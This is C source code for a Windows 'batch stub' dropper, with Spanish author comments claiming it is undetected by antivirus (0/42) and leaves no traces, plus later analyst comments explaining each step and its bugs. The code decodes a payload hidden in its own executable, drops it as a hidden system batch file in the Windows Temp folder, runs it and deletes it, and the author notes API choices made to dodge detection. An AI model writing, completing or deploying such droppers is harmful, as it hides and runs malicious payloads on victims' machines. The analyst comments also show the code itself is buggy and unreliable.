#include <windows.h>
#include <stdio.h>
/*
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
//Batch stub - Incluye cifrado TOR13
//Modulo de autocopia exe - no deja rastros.
//Neeco - Version 1.0
//FUD 0/42 - https://www.virustotal.com/file/204540f7def3a75fd4a8830a9c19031f5fd417b66e4c67d8527c510348c9327a/analysis/1335515677/
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
*/
/*
 * WinMain - self-extracting batch stub.
 *
 * What the body does, in order:
 *   1. Reads the running executable's own file image into memory.
 *   2. Scans that image for the three-byte marker "*+*" and treats everything
 *      after it as the payload; exits via ExitProcess(0) when nothing follows.
 *   3. Decodes the payload by subtracting 13 from each byte ("TOR13" in the
 *      author's terminology).
 *   4. Scans the image for "%0" and, when found, builds a copy in which "%0" is
 *      replaced by the quoted path of this executable.
 *   5. Writes the result to <WINDIR>\Temp\tA1xcp.bat, marks the file
 *      READONLY|HIDDEN|SYSTEM, runs it with CreateProcess, waits for it,
 *      then clears the attributes and removes the file with the CRT remove().
 *
 * Analyst notes (everything below is visible in this function): the drop path
 * and file name are hard-coded; the dropped file is created with the hidden and
 * system bits set and is deleted right after the child process ends; the
 * process reads its own module file via GetModuleFileNameA/CreateFileA. No
 * return value of any Win32 call is checked (CreateFileA, GetFileSize,
 * ReadFile, WriteFile, CreateProcess), and several pointers that were
 * GlobalAlloc'd are later overwritten with interior pointers into `buffer`
 * (see `batch` and `add` below), so the final GlobalFree calls operate on
 * pointers that were not returned by GlobalAlloc.
 *
 * The four WinMain parameters are not used by the body. Returns 0.
 */
int WINAPI WinMain ( HINSTANCE hThisInstance, HINSTANCE hPrevInstance,
LPSTR lpszArgument, int nCmdShow ) {
PROCESS_INFORMATION pi;
//Only the cb member is initialised (below); the remaining STARTUPINFO fields
//hold whatever was on the stack when CreateProcess reads them.
STARTUPINFO stinfo;
DWORD i, dwBytes;
//One-character string holding a double quote, appended around the exe path.
char *a = "\"";
//Output image with "%0" expanded to the quoted exe path; GPTR zero-fills it.
char *nuevo = (char*) GlobalAlloc (GPTR, 500 + MAX_PATH);
//This allocation is never used: `add` is reassigned to point into `buffer`.
char *add = (char*) GlobalAlloc (GPTR, 250 );
stinfo.cb = sizeof ( STARTUPINFO );
//Full path of the running executable.
char *appname = (char*) GlobalAlloc ( GPTR, MAX_PATH );
GetModuleFileNameA ( GetModuleHandleA ( 0L ), appname, MAX_PATH );
//Open the executable's own file and read the whole image into `buffer`.
//Neither the handle nor the sizes/counts are validated.
HANDLE file = CreateFileA ( appname, GENERIC_READ, 0, 0, OPEN_EXISTING, 0, 0 );
DWORD size = GetFileSize ( file, 0 );
char *buffer = (char*) GlobalAlloc ( GPTR, size );
//This allocation is only used when the marker is not found (its first byte
//stays 0, which triggers the exit below); otherwise `batch` is re-pointed into
//`buffer` and this block is leaked.
char *batch = (char*) GlobalAlloc ( GPTR, size );
ReadFile ( file, buffer, size, &dwBytes, 0 );
CloseHandle ( file );
//Search the buffer for the "*+*" marker; the payload starts right after it.
//The loop bound is i<=size and the test reads buffer[i+2], so the last
//iterations read past the `size`-byte allocation.
for (i = 0; i<=size; i++ ) {
if ( buffer[i] == '*' && buffer[i+1] == '+' && buffer[i+2] == '*' ) {
batch = buffer + (i+3);
break;
}
}
//Detect an appended EOF / empty payload and stop.
//NOTE(review): with a signed `char`, batch[0] == 142 can never be true, so in
//that configuration only the NUL test is effective - confirm for this build.
if ( batch[0] == 142 || batch[0] == 0x00 ) {
ExitProcess (0);
}
//Apply the "TOR13" decoding: subtract 13 from every byte.
//The loop runs until size-(i+3) is 0, i.e. size-3 iterations counted from the
//start of the file rather than from the marker, so it walks `batch` beyond the
//end of `buffer` by the marker's offset.
for ( i = 0; size-(i+3); i++ ) {
batch[i] = batch[i] - 13;
}
//"%0" replacement: substitute the quoted path of this executable.
//`x` and `count` are declared but never used.
int x, count = 0;
BOOL stac = FALSE;
//Scans `buffer` (the image from offset 0, up to its first NUL byte), not
//`batch`. NOTE(review): in a PE image a NUL appears very early, so this scan
//presumably covers only the first few bytes - verify against a real build.
for ( i = 0; i<=lstrlenA(buffer); i++ ) {
//37 == '%', 48 == '0'
if ( buffer[i] == 37 && buffer[i+1] == 48 ) {
//`add` now points at the text following "%0" inside `buffer`.
add = buffer + i + 2;
//34 == '"'. Builds nuevo = buffer[0..i-1) + '"' + appname + '"' + rest.
//Each append lands at the current lstrlenA(nuevo), so a second match
//appends after the previous content instead of replacing it.
nuevo[i-1] = 34;
CopyMemory (&nuevo[0], &buffer[0], i-1);
CopyMemory (&nuevo[lstrlenA(nuevo)], &appname[0], lstrlenA(appname));
CopyMemory (&nuevo[lstrlenA(nuevo)],&a[0],1);
CopyMemory (&nuevo[lstrlenA(nuevo)], &add[0], lstrlenA(add));
stac = TRUE;
}
}
//Author's note: this part is done with the Win32 API - heuristic detection range: 20 %
//With the stdio library: 2.0 # fstream - 0.0
//Drop path: <WINDIR>\Temp\tA1xcp.bat (hard-coded file name).
LPSTR Dir = (LPSTR) GlobalAlloc ( GPTR, MAX_PATH);
GetWindowsDirectoryA ( Dir, MAX_PATH );
lstrcatA ( Dir, "\\Temp\\tA1xcp.bat" );
HANDLE File = CreateFileA ( Dir, GENERIC_WRITE, 0, 0, CREATE_ALWAYS, 0, 0 );
//Write either the decoded payload or the "%0"-expanded copy. Note that `i`
//here is the value left by the "%0" scan loop (lstrlenA(buffer)+1), not the
//marker offset, so the byte count written is size - lstrlenA(buffer) - 4
//(plus the exe path length in the else branch).
if ( stac == FALSE ) {
WriteFile ( File, batch, size - (i+3), &dwBytes, 0 );
CloseHandle ( File );
} else {
WriteFile ( File, nuevo, size - (i+3) + lstrlenA(appname), &dwBytes, 0 );
CloseHandle ( File );
}
//Hide the dropped file: 0x1|0x2|0x4 == FILE_ATTRIBUTE_READONLY |
//FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM.
SetFileAttributesA ( Dir, 0x1|0x2|0x4 );
//Launch the generated batch file. `stinfo` has only cb set and `pi` is
//filled in by this call; the BOOL result is not checked.
CreateProcess ( Dir, 0, 0, 0, FALSE, 0, 0, 0, &stinfo, &pi );
//Wait for the child to finish, then terminate it (a no-op once it has
//already exited) and release its handles.
WaitForSingleObject ( pi.hProcess, INFINITE );
TerminateProcess ( pi.hProcess, 0 );
CloseHandle ( pi.hProcess );
CloseHandle ( pi.hThread );
//Remove the dropped file: clear the attributes first so the read-only bit
//does not block deletion.
SetFileAttributesA ( Dir, FILE_ATTRIBUTE_NORMAL );
//DeleteFileA ( Dir ); - author's note: this call gets detected, so the CRT remove() is used instead
remove ( Dir );
GlobalFree ( Dir );
GlobalFree ( appname );
//`add` and `batch` point into `buffer` at this point (see the scans above);
//the blocks originally allocated for them are leaked and these two frees are
//handed interior pointers.
GlobalFree ( nuevo ), GlobalFree ( add );
GlobalFree ( buffer ), GlobalFree ( batch );
return 0;
}